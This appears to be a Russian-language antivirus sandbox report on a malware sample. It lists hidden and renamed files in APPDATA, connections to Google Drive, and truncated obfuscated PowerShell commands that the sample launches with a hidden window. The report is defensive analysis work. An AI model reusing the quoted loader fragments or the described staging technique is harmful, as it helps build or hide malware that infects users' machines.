Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\cab1b3e.tmp
- %WINDIR%\temp\tar1b3f.tmp
- %WINDIR%\temp\cab3249.tmp
- %WINDIR%\temp\tar324a.tmp
- %APPDATA%\bitccc0.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\bitccc0.tmp
Удаляет следующие файлы
- %WINDIR%\temp\cab1b3e.tmp
- %WINDIR%\temp\tar1b3f.tmp
- %WINDIR%\temp\cab3249.tmp
- %WINDIR%\temp\tar324a.tmp
Перемещает следующие файлы
- %APPDATA%\bitccc0.tmp в %APPDATA%\uran.tra
Сетевая активность
Подключается к
- 'drive.google.com':443
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
TCP
Запросы HTTP GET
- http://pk#.goog/gsr1/gsr1.crt
Другие
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
UDP
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- DNS ASK drive.usercontent.google.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Spiket Dayberrys Teratolog grammatiks #>;Function Nonintelle ([String]$Levneds){$Chaste=8;$Xylotypog=Unsteri4($Levneds);For($Clinost=7; $Clinost -lt $Xylotypog; $Clinost+=$Chaste){$Unsteri=$...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Spiket Dayberrys Teratolog grammatiks #>;Function Nonintelle ([String]$Levneds){$Chaste=8;$Xylotypog=Unsteri4($Levneds);For($Clinost=7; $Clinost -lt $Xylotypog; $Clinost+=$Chaste){$Unsteri=$...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "<#Spiket Dayberrys Teratolog grammatiks #>;Function Nonintelle ([String]$Levneds){$Chaste=8;$Xylotypog=Unsteri4($Levneds);For($Clinost=7; $Clinost -lt $Xylotypog; $Clinost+=$Chaste){$Unsteri=$...
- '%WINDIR%\syswow64\wermgr.exe' "-outproc" "2376" "1624"
